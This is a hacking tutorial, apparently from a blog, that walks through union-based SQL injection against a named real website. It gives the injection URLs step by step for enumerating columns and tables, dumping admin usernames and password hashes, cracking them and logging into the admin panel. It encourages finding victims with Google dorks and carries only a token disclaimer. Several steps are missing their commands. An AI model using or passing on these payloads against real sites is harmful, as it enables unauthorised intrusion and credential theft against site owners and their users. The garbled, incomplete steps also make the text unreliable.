◆Hack Websites Using SQL Injection and Bypass its Admin Panel!
◆No Tools Needed except your Web Browser
◆Hello there , If you are wondering How to Hack Websites ,then this Tutorial Is for you•
◆You might already learnt about SQL injection from various blogs , so here im directly Discribing the tutorial more understanding way.
◆Firstly we have to find a SQL injection Vulnerable Website.
◆You will Find Thousands Of websites From Google if you use Google Dorks.
◆Here I have Found a sql injection vulnerable Website.
◆We have to Find whether this website is Vulnerable to SQL injection or Not
◆On your web browser type
And execute (execute means click on Go)
If you see
◆You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
◆Then the website is Vulnerable to SQL injection and that site can be hacked , if not the leave that site and choose another
◆We have found that the above site is vulnerable to SQL injection.
◆Now we have to find Columns in its database.
site.com/page.php?id=-2 order by 10–
◆If you see Unknown columns
◆Then decrease the number to lower unless the page loads without any error
http://musculoskeletalsociety.in/page.php?id=-2 order by 10–
◆Error Unknown Columns
◆Then replace 10 with 9 , 8, 7, 6 ,5 ,4..
◆Unless the page loads perfect
◆Here the page loads fine
http://musculoskeletalsociety.in/page.php?id=-2 order by 5–
◆That means it have only 5 columns in its Database
◆Now we have to find its Vulnerable Column
◆So here is The sql Command.
◆Now type In your web browser
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,2,3,4,5–
◆You will see Numbers Between 1-5 on the page
◆I have found 2 on the page so 2nd column is Vulnerable
◆Now we have to Find its Database version and username.
http://musculoskeletalsociety.in/page.php?id=-2 union select 1,@@version,3,4,5–
◆And click on go You will find Database version
◆I have found 5.0 up
◆Note you can replace @@version to version() for database version and
@@user of user() for Database user
◆SQL injection will be easy if the database version is 5.0 up
◆If Database version is below 5.0
◆Then we have to guess everything soon We will Discuss more about it
◆Now we have found its Database Version
◆Now type http://musculoskeletalsociety.in/page.php?id=-2 union+select+ 1,group_concat(table_name),3,4,5+from+information_schema.tables+where+table_schema=database()–
◆You will see it’s Tables
◆Now we want its Admin Table Details
For that type this command
◆Now you will see its Username ,Password, email etc.. Columns
◆Now we only want Username and password•
◆For that apply this command•
http://musculoskeletalsociety.in/page.php?id=-2 union+select+1,group_concat(user_id,0x3a,password),3,4,5+from admin–
◆Here admin is the table name which we got from previous command
◆Don’t be confused you may find admin_table or tbl_admin or administrator etc on other websites
◆Here 0x3a is the hexadecimal value of :
◆By executing the above command you will see its username and password
◆Note the password may be Encrypted by md5 or other encryptions so we have to decrypt it
◆Here is a website to decrypt the hash
Go hashkiller.co.uk and decrypt there
◆Search for the website’s admin panel
◆You can find it by
◆Etc finally find admin panel some how and enter the username and Password
◆Here I m presented some Automated SQL injection Tools For Android
Note: This Tutorial is Only For Education Purpose We are Not Responsible for any Mistake or Misuse Done by you..
If you have any questions please feel free to ask us.